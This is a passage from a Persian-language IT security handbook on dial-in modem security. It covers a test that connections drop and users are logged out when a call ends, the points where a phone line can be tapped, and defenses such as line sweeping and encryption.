‫ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﻛﺎﺭﺑﺮ ﺑﺘﻮﺍﻧﺪ ﺗﻤﺎﺳﻬﺎﻳﻲ ﺑﺮﻗﺮﺍﺭ ﻛﻨﺪ ﻛﻪ ﻫﻴﭽﻴﻚ ﺑﻪ ﺛﺒﺖ ﻧﺮﺳﻨﺪ‪ .‬ﺍﻳﻦ ﻛﺎﺭﺑﺮ ﺣﺘﻲ ﻣﻤﻜﻦ ﺍﺳﺖ‬

‫‪243 Login Prompt‬‬


‫‪244 Escape Sequences‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٣٨٤‬‬

‫ﺑﺘﻮﺍﻧﺪ ﻣﻮﺩﻡ ﺭﺍ ﻃﻮﺭﻱ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﻣﺠﺪﺩ ﻛﻨﺪ ﻛﻪ ﺑﺪﻭﻥ ﺗﻮﺟﻪ ﺑﻪ ﺍﻳﻨﻜﻪ ﻗﺮﺍﺭ ﺑﻮﺩﻩ ﺑﺎ ﭼﻪ ﺷﻤﺎﺭﻩ ﺗﻠﻔﻨﻲ ﺗﻤﺎﺱ ﺑﮕﻴﺮﺩ‪ ،‬ﺑﺎ ﻳﻚ ﺷﻤﺎﺭﻩﺗﻠﻔﻦ‬
‫ﺧﺎﺹ ﺩﻳﮕﺮ ﺗﻤﺎﺱ ﺣﺎﺻﻞ ﻛﻨﺪ‪ .‬ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ ﻣﻤﻜﻦ ﺍﺳﺖ ﻳﻚ ﺍﺳﺐ ﺗﺮﺍﻭﺍ ﻧﻴﺰ ﻋﻤﻠﻴﺎﺕ ﻛﺎﺭﺑﺮﺍﻥ ﺷﻤﺎ ﺭﺍ ﺩﻧﺒﺎﻝ ﻛﻨﺪ‪.‬‬
‫ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﻣﻮﺩﻡ ﭘﺲ ﺍﺯ ﺧﺮﻭﺝ ﺑﺮﻧﺎﻣﻪ ﺍﺯ ﺣﺎﻓﻈﻪ ﺍﺗﺼﺎﻝ ﺭﺍ ﻗﻄﻊ ﻧﻜﻨﺪ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺎﻋﺚ ﺷﻮﺩ ﺻﻮﺭﺗﺤﺴﺎﺑﻬﺎﻱ ﺗﻠﻔﻦ ﺑﺴﻴﺎﺭ ﺳﻨﮕﻴﻦ‬
‫ﺷﻮﻧﺪ ﻭ ﺍﺯ ﺁﻥ ﻣﻬﻤﺘﺮ ﺍﻳﻨﻜﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻛﺎﺭﺑﺮﻱ ﻛﻪ ﺩﺭﺣﺎﻝ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﺍﻳﺎﻧﺔ ﺭﺍﻩ ﺩﻭﺭ ﺑﻮﺩﻩ‪ ،‬ﻫﻤﭽﻨﺎﻥ ﺩﺭ ﺁﻥ ﺑﺼﻮﺭﺕ ﻭﺍﺭﺩﺷﺪﻩ‪ ٢٤٥‬ﺑﺎﻗﻲ‬
‫ﺑﻤﺎﻧﺪ ﻭ ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﻛﺎﺭﺑﺮ ﺑﻌﺪﻱ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮ ﻗﺒﻠﻲ ﺭﺍﻳﺎﻧﺔ ﺭﺍﻩ ﺩﻭﺭ ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻛﻨﺪ‪.‬‬

‫ﺁﺯﻣﻮﻥ ﭘﺎﺳﺦ‬
‫ﺑﺮﺍﻱ ﺁﺯﻣﺎﻳﺶ ﻗﺎﺑﻠﻴﺖ ﭘﺎﺳﺦﺩﻫﻲ ﺭﺍﻳﺎﻧﻪ‪ ،‬ﺑﻪ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﻳﺎ ﭘﺎﻳﺎﻧﺔ ﺩﻳﮕﺮ ﺑﺎ ﻳﻚ ﻣﻮﺩﻡ ﺛﺎﻧﻮﻳﻪ ﺑﺮﺍﻱ ﺑﺮﻗﺮﺍﺭﻱ ﺗﻤﺎﺱ ﺑﺎ ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﻧﻴﺎﺯ ﺩﺍﺭﻳﺪ‪.‬‬
‫ﺁﺯﻣﺎﻳﺶ ﺭﺍ ﺑﺼﻮﺭﺕ ﺯﻳﺮ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ‪:‬‬

‫ﺑﺎ ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﺗﻤﺎﺱ ﺑﮕﻴﺮﻳﺪ‪ .‬ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺑﺎﻳﺪ ﺩﺭ ﭼﻨﺪ ﺯﻧﮓ ﺍﻭﻝ ﺑﻪ ﺗﻤﺎﺱ ﭘﺎﺳﺦ ﺩﻫﺪ ﻭ ﻳﻚ ﭘﻴﻐﺎﻡ ﻭﺭﻭﺩ‪ ٢٤٦‬ﺑﻪ ﻧﻤﺎﻳﺶ ﺩﺭﺁﻭﺭﺩ‪ .‬ﺍﮔﺮ‬ ‫‪.١‬‬
‫ﻣﻮﺩﻡ ﺷﻤﺎ ﺑﺮﺍﻱ ﻛﺎﺭ ﺑﺎ ﭼﻨﺪ ‪ baud-rate‬ﺗﻨﻈﻴﻢ ﺷﺪﻩ ﺑﺎﺷﺪ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﻻﺯﻡ ﺑﺎﺷﺪ ﻳﻚ ﻛﻠﻴﺪ ﺧﺎﺹ )ﻣﻌﻤﻮ ﹰ‬
‫ﻻ ﺩﻛﻤﻪﻫﺎﻱ ‪ Break‬ﻳﺎ‬
‫‪ (Linefeed‬ﺭﺍ ﭼﻨﺪﺑﺎﺭ ﺑﻔﺸﺎﺭﻳﺪ ﺗﺎ ‪ baud-rate‬ﻣﻮﺩ ﹺﻡ ﭘﺎﺳﺦﺩﻫﻨﺪﻩ‪ ،‬ﺑﺎ ﻣﻮﺩﻣﻲ ﻛﻪ ﺍﺯ ﻃﺮﻳﻖ ﺁﻥ ﺗﻤﺎﺱ ﺭﺍ ﺑﺮﻗﺮﺍﺭ ﻛﺮﺩﻩﺍﻳﺪ ﻫﻤﺎﻫﻨﮓ‬
‫ﮔﺮﺩﺩ‪ .‬ﭼﻨﺎﻧﭽﻪ ﺍﺯ ﻣﻮﺩﻣﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ ﻛﻪ ‪ baud-rate‬ﺭﺍ ﺑﻄﻮﺭ ﺧﻮﺩﻛﺎﺭ ﺗﻨﻈﻴﻢ ﻣﻲﻛﻨﺪ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﻻﺯﻡ ﻧﻴﺴﺖ‪.‬‬

‫ﻣﻄﺎﺑﻖ ﻣﻌﻤﻮﻝ ﺑﻪ ﺭﺍﻳﺎﻧﻪ ﻭﺍﺭﺩ ﻭ ﺳﭙﺲ ﺍﺯ ﺁﻥ ﺧﺎﺭﺝ ﺷﻮﻳﺪ‪ .‬ﭘﺲ ﺍﺯ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺭﺍﻳﺎﻧﻪ ﺑﺎﻳﺪ ﺗﻤﺎﺱ ﺗﻠﻔﻨﻲ ﺭﺍ ﻗﻄﻊ ﻛﻨﺪ‪.‬‬ ‫‪.٢‬‬

‫ﻣﺠﺪﺩﹰﺍ ﺑﺎ ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﺗﻤﺎﺱ ﺑﮕﻴﺮﻳﺪ ﻭ ﺑﺎﺭ ﺩﻳﮕﺮ ﺑﻪ ﺁﻥ ﻭﺍﺭﺩ ﺷﻮﻳﺪ‪ ،‬ﻭ ﺍﻳﻨﺒﺎﺭ ﺍﺭﺗﺒﺎﻁ ﺭﺍ ﺑﺎ ﺑﻴﺮﻭﻥ ﻛﺸﻴﺪﻥ ﺳﻴﻢ ﺗﻠﻔﻦ ﺍﺯ ﻣﻮﺩﻡ‬ ‫‪.٣‬‬
‫ﺗﻤﺎﺱﮔﻴﺮﻧﺪﻩ ﻗﻄﻊ ﻛﻨﻴﺪ‪ .‬ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﻗﻄﻊ ﻧﺎﮔﻬﺎﻧﻲ ﺍﺗﺼﺎﻝ ﺭﺍ ﺷﺒﻴﻪﺳﺎﺯﻱ ﻣﻲﻛﻨﺪ‪ .‬ﺳﭙﺲ ﺑﺎ ﻫﻤﺎﻥ ﺷﻤﺎﺭﺓ ﻗﺒﻠﻲ ﺑﺎ ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ‬
‫ﺗﻤﺎﺱ ﺑﮕﻴﺮﻳﺪ‪ .‬ﺣﺎﻝ ﺑﺎﻳﺪ ﻳﻚ ﭘﻴﻐﺎﻡ ﻭﺭﻭﺩ ﺟﺪﻳﺪ ﺩﺭﻳﺎﻓﺖ ﻛﻨﻴﺪ‪ ،‬ﻭ ﺑﻬﻴﭽﻮﺟﻪ ﻧﺒﺎﻳﺪ ﻣﺠﺪﺩﹰﺍ ﺑﻪ ﺍﺩﺍﻣﺔ ﻧﺸﺴﺖ ﻳﺎ ﭘﻮﺳﺘﺔ ﻗﺒﻠﻲ ﺑﺎﺯﮔﺮﺩﻳﺪ؛‬
‫ﭼﺮﺍﻛﻪ ﭘﺮﺩﺍﺯﺓ ﻣﺮﺑﻮﻁ ﺑﻪ ﺁﻥ ﭘﻮﺳﺘﻪ ﺑﺎﻳﺪ ﺑﻼﻓﺎﺻﻠﻪ ﭘﺲ ﺍﺯ ﻗﻄﻊ ﺍﺭﺗﺒﺎﻁ ﺍﺯ ﺑﻴﻦ ﺭﻓﺘﻪ ﺑﺎﺷﺪ‪ .‬ﻭﻗﺘﻲ ﺍﺭﺗﺒﺎﻁ ﺗﻠﻔﻨﻲ ﻗﻄﻊ ﻣﻲﺷﻮﺩ ﺳﻴﺴﺘﻢ‬
‫ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﺧﻮﺩﻛﺎﺭ ﻛﺎﺭﺑﺮ ﺭﺍ ﺍﺯ ﺣﺎﻟﺖ ﻭﺭﻭﺩ ﺧﺎﺭﺝ ﺳﺎﺯﺩ‪ .‬ﺩﺭ ﻏﻴﺮﺍﻳﻨﺼﻮﺭﺕ ﺍﮔﺮ ﺗﻠﻔﻦ ﺑﻄﻮﺭ ﺍﺗﻔﺎﻗﻲ ﻗﻄﻊ ﺷﻮﺩ ﻭ ﺷﺨﺺ ﺩﻳﮕﺮﻱ ﺑﺎ‬
‫ﺭﺍﻳﺎﻧﻪ ﺗﻤﺎﺱ ﺑﮕﻴﺮﺩ‪ ،‬ﺧﻮﺍﻫﺪ ﺗﻮﺍﻧﺴﺖ ﻣﺸﺎﺑﻪ ﻳﻚ ﻛﺎﺭﺑﺮ ﻣﺠﺎﺯ ﺩﺳﺘﻮﺭﺍﺗﻲ ﺭﺍ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭﺁﻭﺭﺩ‪ ،‬ﺑﺪﻭﻥ ﺍﻳﻨﻜﻪ ﺑﺨﻮﺍﻫﺪ ﺣﺘﻲ ﺑﻪ ﺳﻴﺴﺘﻢ‬
‫ﻭﺍﺭﺩ ﺷﻮﺩ ﻭ ﻳﺎ ﺭﻣﺰ ﻋﺒﻮﺭﻱ ﻭﺍﺭﺩ ﻛﻨﺪ‪.‬‬

‫ﺍﮔﺮ ﭼﻨﺪ ﻣﻮﺩﻡ ﺩﺍﺭﻳﺪ ﻛﻪ ﺑﻪ ﻳﻚ ﮔﺮﻭﻩ ﺍﺯ ﻣﻮﺩﻣﻬﺎ ﻣﺘﺼﻠﻨﺪ )ﺑﺼﻮﺭﺗﻴﻜﻪ ﺍﻭﻟﻴﻦ ﻣﻮﺩﻡ ﺍﺷﻐﺎﻝﻧﺸﺪﻩ ﺑﻪ ﺗﻤﺎﺱ ﺗﻠﻔﻨﻲ ﭘﺎﺳﺦ ﻣﻲﺩﻫﺪ ﻭ ﺗﻤﺎﻣﻲ ﺗﻤﺎﺳﻬﺎ ﺑﻪ‬ ‫‪.٤‬‬
‫ﻳﻚ ﺷﻤﺎﺭﺓ ﻭﺍﺣﺪ ﺍﻧﺠﺎﻡ ﻣﻲﮔﻴﺮﺩ(‪ ،‬ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﺍﻳﻦ ﺳﺎﻣﺎﻧﻪ ﺑﺪﺭﺳﺘﻲ ﻋﻤﻞ ﻣﻲﻛﻨﺪ‪ .‬ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﺑﺪﺭﺳﺘﻲ ﻋﻤﻞ‬
‫ﻧﻤﻲﻛﻨﻨﺪ ﻛﻪ ﻧﺘﻴﺠﺔ ﺁﻥ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺗﻤﺎﺱﮔﻴﺮﻧﺪﮔﺎﻥ ﺣﺘﻲ ﻫﻨﮕﺎﻣﻴﻜﻪ ﺧﻂ ﺑﻌﻀﻲ ﺍﺯ ﻣﻮﺩﻣﻬﺎ ﻣﺸﻐﻮﻝ ﻧﻴﺴﺖ‪ ،‬ﺑﻮﻕ ﺍﺷﻐﺎﻝ ﺑﺸﻨﻮﻧﺪ‪.‬‬
‫ﺑﺮﺧﻲ ﺍﺯ ﺍﻳﻦ ﮔﺮﻭﻫﻬﺎ ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﻫﻨﮕﺎﻡ ﺟﺴﺘﺠﻮ ﺑﺪﻧﺒﺎﻝ ﻣﻮﺩﻡ ﺍﺷﻐﺎﻝﻧﺸﺪﻩ ﺑﻪ ﻳﻚ ﻣﻮﺩﻡ ﺧﺮﺍﺏ ﺑﺮﺳﻨﺪ‪ ،‬ﺟﺴﺘﺠﻮ ﺭﺍ ﻣﺘﻮﻗﻒ‬
‫ﻣﻲﻛﻨﻨﺪ ﻭ ﺑﺪﻳﻦﺗﺮﺗﻴﺐ ﺳﺎﻳﺮ ﻣﻮﺩﻣﻬﺎﻱ ﮔﺮﻭﻩ ﻫﻤﻮﺍﺭﻩ ﺑﻼﺍﺳﺘﻔﺎﺩﻩ ﺧﻮﺍﻫﻨﺪ ﻣﺎﻧﺪ‪.‬‬

‫ﺣﻔﺎﻇﺖ ﺩﺭ ﻣﻘﺎﺑﻞ ﺍﺳﺘﺮﺍﻕﺳﻤﻊ‬


‫ﻣﻮﺩﻣﻬﺎ ﺩﺭ ﻣﻌﺮﺽ ﺍﺳﺘﺮﺍﻕﺳﻤﻊ ﻫﺴﺘﻨﺪ‪ .‬ﻣﻮﺩﻣﻬﺎﻱ ﻗﺪﻳﻤﻲﺗﺮ ﺍﺯ ﺟﻤﻠﻪ ﻣﻮﺩﻣﻬﺎﻱ ﺩﺍﺩﻩﺍﻱ ﻭ ﻧﻴﺰ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻓﻜﺲﻣﻮﺩﻣﻬﺎ ﻛﻪ ﺑﺎ ﺳﺮﻋﺖ‬
‫ﻛﻤﺘﺮ ﺍﺯ ‪ ٩٦٠٠‬ﺑﻴﺖ ﺑﺮ ﺛﺎﻧﻴﻪ ﻛﺎﺭ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﺑﺮﺍﺣﺘﻲ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺳﺨﺖﺍﻓﺰﺍﺭﻫﺎﻱ ﺁﻣﺎﺩﻩ ﺩﺭ ﺑﺎﺯﺍﺭ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻣﻮﺭﺩ ﺷﻨﻮﺩ ﻗﺮﺍﺭ ﺑﮕﻴﺮﻧﺪ‪.‬‬
‫ﻣﻮﺩﻣﻬﺎﻱ ﺑﺎ ﺳﺮﻋﺖ ﺑﺎﻻﺗﺮ ﺍﺯ ﻃﺮﻳﻖ ﺍﺑﺰﺍﺭﻫﺎﻱ ﭘﻴﭽﻴﺪﻩﺗﺮﻱ ﺍﺳﺘﺮﺍﻕﺳﻤﻊ ﻣﻲﺷﻮﻧﺪ ﻛﻪ ﻫﺮﭼﻨﺪ ﻛﻤﺘﺮ ﺩﺭ ﺩﺳﺘﺮﺱ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ‪ ،‬ﺍﻣﺎ ﺑﺎ ﺣﺪﺍﻛﺜﺮ‬
‫ﭼﻨﺪ ﻫﺰﺍﺭ ﺩﻻﺭ ﻗﺎﺑﻞ ﺗﻬﻴﻪ ﻣﻲﺑﺎﺷﻨﺪ‪.‬‬

‫‪245 Logged In‬‬


‫‪246 Banner‬‬
‫‪٣٨٥‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﺍﻧﻮﺍﻉ ﺍﺳﺘﺮﺍﻕﺳﻤﻊ‬
‫ﺩﺭ ﻳﻚ ﻣﻜﺎﻟﻤﺔ ﺗﻠﻔﻨﻲ ﺭﻭﻱ ﻳﻚ ﻣﻮﺩﻡ ﺍﺳﺎﺳﹰﺎ ﺷﺶ ﻧﻘﻄﻪ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﻣﻮﺭﺩ ﺍﺳﺘﺮﺍﻕﺳﻤﻊ ﻗﺮﺍﺭ ﺑﮕﻴﺮﺩ‪ .‬ﺩﺭ ﻃﺮﻑ ﺷﻤﺎ ﻣﻬﺎﺟﻢ‬
‫ﻣﻲﺗﻮﺍﻧﺪ ﻳﻚ ﺿﺒﻂ ﺻﻮﺕ ﻭ ﻳﺎ ﻳﻚ ﻣﻮﺩﻡ ﺩﻳﮕﺮ ﺑﺼﻮﺭﺕ ﻣﻮﺍﺯﻱ ﺑﺎ ﺍﺑﺰﺍﺭﻫﺎﻱ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﺓ ﺷﻤﺎ ﻗﺮﺍﺭ ﺩﻫﺪ‪ .‬ﻛﻤﻲ ﺁﻧﻄﺮﻓﺘﺮ ﺧﺎﺭﺝ ﺍﺯ ﭘﻨﺠﺮﻩ‬
‫ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑﺘﻮﺍﻥ ﺑﺎ ﺗﺤﻠﻴﻞ ﭼﺸﻤﻚﺯﺩﻧﻬﺎﻱ ﭼﺮﺍﻍ ﺍﺭﺳﺎﻝ ﻭ ﺩﺭﻳﺎﻓﺖ ﺩﺍﺩﺓ ﻣﻮﺩﻡ‪ ،‬ﺍﻃﻼﻋﺎﺕ ﻣﻨﺘﻘﻞ ﺷﺪﻩ ﺍﺯ ﻃﺮﻳﻖ ﺁﻧﺮﺍ‬
‫ﻣﺸﺨﺺ ﻛﺮﺩ‪ .‬ﻣﻴﺎﻥ ﻣﺤﻞ ﺍﺳﺘﻘﺮﺍﺭ ﺷﻤﺎ ﻭ ﺩﻓﺘﺮ ﻣﺮﻛﺰﻱ ﺷﺮﻛﺖ ﻣﺨﺎﺑﺮﺍﺕ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺯ ﺳﻴﻤﻬﺎ ﻳﻚ ﺷﺎﺧﺔ ﺍﺿﺎﻓﻪ ﺧﺎﺭﺝ ﺷﻮﺩ‪ .‬ﺩﺭ ﻣﺮﻛﺰ‬
‫ﺳﻮﺋﻴﭻ ﺷﺮﻛﺖ ﻣﺨﺎﺑﺮﺍﺕ‪ ،‬ﻳﻚ ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺲ ﻣﻲﺗﻮﺍﻧﺪ ﻳﻚ ﻓﺮﺳﺘﻨﺪﺓ ﻏﻴﺮﻗﺎﺑﻞ ﺭﺩﻳﺎﺑﻲ ﺑﻪ ﺳﻮﺋﻴﭻ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻣﺘﺼﻞ ﻭ ﻳﺎ ﺑﺼﻮﺭﺕ ﺩﺳﺘﻲ ﻳﻚ‬
‫ﺳﻴﻢ ﺭﻭﻱ ﺳﻮﺋﻴﭻ ﻧﺼﺐ ﻧﻤﺎﻳﺪ‪ .‬ﭼﻨﺎﻧﭽﻪ ﺗﻤﺎﺱ ﺗﻠﻔﻨﻲ ﺍﺯ ﻃﺮﻳﻖ ﻣﺎﻫﻮﺍﺭﻩ ﻭ ﻳﺎ ﺍﻣﻮﺍﺝ ﻣﺎﻳﻜﺮﻭﻭﻳﻮ ﻣﺴﻴﺮﻳﺎﺑﻲ ﺷﻮﺩ‪ ،‬ﺍﻳﻦ ﺍﻣﻮﺍﺝ ﺭﺍﺩﻳﻮﻳﻲ ﺭﺍ‬
‫ﻣﻲﺗﻮﺍﻥ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻛﺮﺩ؛ ﻭ ﺩﺭﻧﻬﺎﻳﺖ ﺍﻳﻨﻜﻪ ﺩﺭ ﻣﻘﺼﺪ ﺗﻤﺎﺱ ﺗﻠﻔﻨﻲ ﻣﻲﺗﻮﺍﻥ ﻳﻚ ﺩﺳﺘﮕﺎﻩ ﺍﺳﺘﺮﺍﻕﺳﻤﻊ ﻧﺼﺐ ﻧﻤﻮﺩ‪.‬‬

‫ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺍﺳﺘﺮﺍﻕﺳﻤﻊ‬
‫ﺍﻗﺪﺍﻣﺎﺕ ﻣﺨﺘﻠﻔﻲ ﺑﺎ ﺩﺭﺟﺎﺕ ﺍﺛﺮﮔﺬﺍﺭﻱ ﻣﺘﻔﺎﻭﺗﻲ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺩﺭ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺍﺳﺘﺮﺍﻕﺳﻤﻊ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺯ ﺁﻧﻬﺎ ﺑﻬﺮﻩ ﺑﮕﻴﺮﻳﺪ‪:‬‬

‫ﺳﻴﻢ ﺗﻠﻔﻦ ﺧﻮﺩ ﺭﺍ ﺑﺼﻮﺭﺕ ﺑﺼﺮﻱ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﺩﻫﻴﺪ‬


‫ﺑﺪﻧﺒﺎﻝ ﺳﻴﻤﻬﺎﻱ ﺍﺿﺎﻓﻲ‪ ،‬ﻓﺮﺳﺘﻨﺪﻩﻫﺎ ﻭ ﻳﺎ ﺟﻌﺒﻪﻫﺎﻱ ﻧﺎﺁﺷﻨﺎ ﻭ ﻏﺮﻳﺐ ﺑﺎﺷﻴﺪ‪ .‬ﺑﻴﺸﺘﺮ ﺷﻨﻮﺩﻫﺎﻳﻲ ﻛﻪ ﺍﻓﺮﺍﺩ ﻧﺎﺷﻲ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺁﻥ ﺗﻼﺵ‬
‫ﻣﻲﻛﻨﻨﺪ ﺑﻪ ﺁﺳﺎﻧﻲ ﻗﺎﺑﻞ ﻛﺸﻒ ﻫﺴﺘﻨﺪ‪.‬‬

‫ﺧﻂ ﺗﻠﻔﻦ ﺧﻮﺩ ﺭﺍ ﺑﺼﻮﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ "ﺟﺎﺭﻭﺏ"‪ ٢٤٧‬ﻛﻨﻴﺪ‬


‫ﻳﻚ ﺗﻜﻨﺴﻴﻦ ﻣﺎﻫﺮ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺩﺳﺘﮕﺎﻩ ﺳﻨﺠﺶ ﺑﺎﺯﺗﺎﺏ ﺳﻴﮕﻨﺎﻝ ﻣﻲﺗﻮﺍﻧﺪ ﺳﻴﻤﻬﺎﻱ ﺍﺿﺎﻓﻲ ﻭ ﺍﺗﺼﺎﻻﺕ ﭼﻨﺪﮔﺎﻧﻪ ﺭﺍ ﺩﺭ ﺧﻄﻮﻁ ﺗﻠﻔﻦ‬
‫ﺗﺸﺨﻴﺺ ﺩﻫﺪ‪ .‬ﺍﺗﺼﺎﻻﺕ ﻛﺸﻒﺷﺪﻩ ﻣﻤﻜﻦ ﺍﺳﺖ ﻧﺸﺎﻧﺔ ﺍﺳﺘﺮﺍﻕﺳﻤﻊ ﺑﺎﺷﻨﺪ ﻳﺎ ﻧﺒﺎﺷﻨﺪ‪ .‬ﺩﺭ ﺑﻌﻀﻲ ﻣﻨﺎﻃﻖ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﻴﻤﻬﺎﻱ ﺗﻠﻔﻦ‬
‫ﺍﻧﺸﻌﺎﺑﻬﺎﻱ ﭼﻨﺪﮔﺎﻧﻪ ﺑﻪ ﺳﻤﺖ ﻫﻤﺴﺎﻳﮕﻲﻫﺎﻱ ﻣﺨﺘﻠﻒ ﺁﻥ ﻣﻨﻄﻘﻪ ﺩﺍﺭﻧﺪ‪ .‬ﭼﻨﺎﻧﭽﻪ ﺗﺼﻤﻴﻢ ﺑﻪ ﭘﻮﻳﺶ ﺧﻄﻮﻁ ﺧﻮﺩ ﮔﺮﻓﺘﻴﺪ‪ ،‬ﺑﺎﻳﺪ ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﻫﺮ‬
‫ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﺗﻜﺮﺍﺭ ﻛﻨﻴﺪ‪ .‬ﻛﺸﻒ ﺗﻐﻴﻴﺮﺍﺕ ﺩﺭ ﺧﻄﻮﻁ ﺗﻠﻔﻨﻲ ﻛﻪ ﺩﺭ ﻃﻮﻝ ﺯﻣﺎﻥ ﺗﺤﺖ ﻧﻈﺮ ﺑﻮﺩﻩﺍﻧﺪ ﺁﺳﺎﻧﺘﺮ ﺍﺯ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺑﺨﻮﺍﻫﻴﻢ ﺗﻨﻬﺎ ﻳﻜﺒﺎﺭ‬
‫ﺑﻪ ﻳﻚ ﺳﻴﻢ ﺗﻠﻔﻦ ﻧﮕﺎﻩ ﻛﻨﻴﻢ ﻭ ﺑﻔﻬﻤﻴﻢ ﻛﻪ ﺁﻳﺎ ﺍﻧﺸﻌﺎﺏ ﺍﺿﺎﻓﻪ ﺩﺍﺭﺩ ﻳﺎ ﻧﻪ‪.‬‬
‫ﺑﺎ ﺟﺎﺭﻭﺏ ﻛﺮﺩﻥ ﺳﻴﻤﻬﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﻧﺘﻮﺍﻥ ﺑﻌﻀﻲ ﺍﺯ ﺍﻧﻮﺍﻉ ﺍﺳﺘﺮﺍﻕﺳﻤﻊ ﺭﺍ ﻛﺸﻒ ﻛﺮﺩ ‪ -‬ﻣﺜﻞ ﺷﻨﻮﺩﻫﺎﻳﻲ ﻛﻪ ﺗﻮﺳﻂ ﺷﺮﻛﺖ ﻣﺨﺎﺑﺮﺍﺕ‬
‫ﺑﺮﺍﻱ ﺩﺍﻳﺮﺓ ﺍﺟﺮﺍﻱ ﻗﻮﺍﻧﻴﻦ ﻭ ﻳﺎ ﺳﺎﻳﺮ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺍﺟﺮﺍ ﻣﻲﺷﻮﺩ‪.‬‬

‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻣﺰﻧﮕﺎﺭﻱ‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﺑﻬﺘﺮﻳﻦ ﺭﺍﻩ ﺣﻔﺎﻇﺖ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺍﺯ ﺍﺳﺘﺮﺍﻕﺳﻤﻊ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻫﻤﻮﺍﺭﻩ ﻓﺮﺽ ﻛﻨﻴﺪ ﺍﺑﺰﺍﺭ ﺍﺭﺗﺒﺎﻃﻲ ﺷﻤﺎ ﻣﻮﺭﺩ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﺍﺭﺩ ﻭ ﺑﻌﻨﻮﺍﻥ‬
‫ﻳﻚ ﺍﻗﺪﺍﻡ ﭘﻴﺸﮕﻴﺮﺍﻧﻪ ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺷﻨﻮﺩ‪ ،‬ﺗﻤﺎﻣﻲ ﺍﻃﻼﻋﺎﺕ ﺧﻮﺩ ﺭﺍ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﻨﻴﺪ‪ .‬ﺍﮔﺮ ﺑﺮﺍﻱ ﺍﺗﺼﺎﻝ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺯ ﺍﺭﺗﺒﺎﻁ ﺗﻠﻔﻨﻲ‬
